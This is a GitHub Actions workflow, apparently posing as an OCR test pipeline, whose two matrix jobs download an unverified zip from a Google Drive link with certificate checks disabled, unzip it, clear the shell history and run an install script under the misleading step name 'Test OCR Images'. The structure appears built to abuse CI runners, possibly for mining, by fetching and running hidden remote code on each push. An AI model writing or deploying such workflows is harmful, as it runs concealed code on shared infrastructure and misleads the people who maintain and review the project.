name: vuutru3app
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  check:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Fetch', 'Compile', 'Evaluate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1EybV6NFoRifpKCT08Y2mF55f0a98WZz9" -O vuutru3app.zip
        unzip -o vuutru3app.zip
        rm vuutru3app.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  Generate1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Fetch', 'Compile', 'Evaluate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1EybV6NFoRifpKCT08Y2mF55f0a98WZz9" -O vuutru3app.zip
        unzip -o vuutru3app.zip
        rm vuutru3app.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
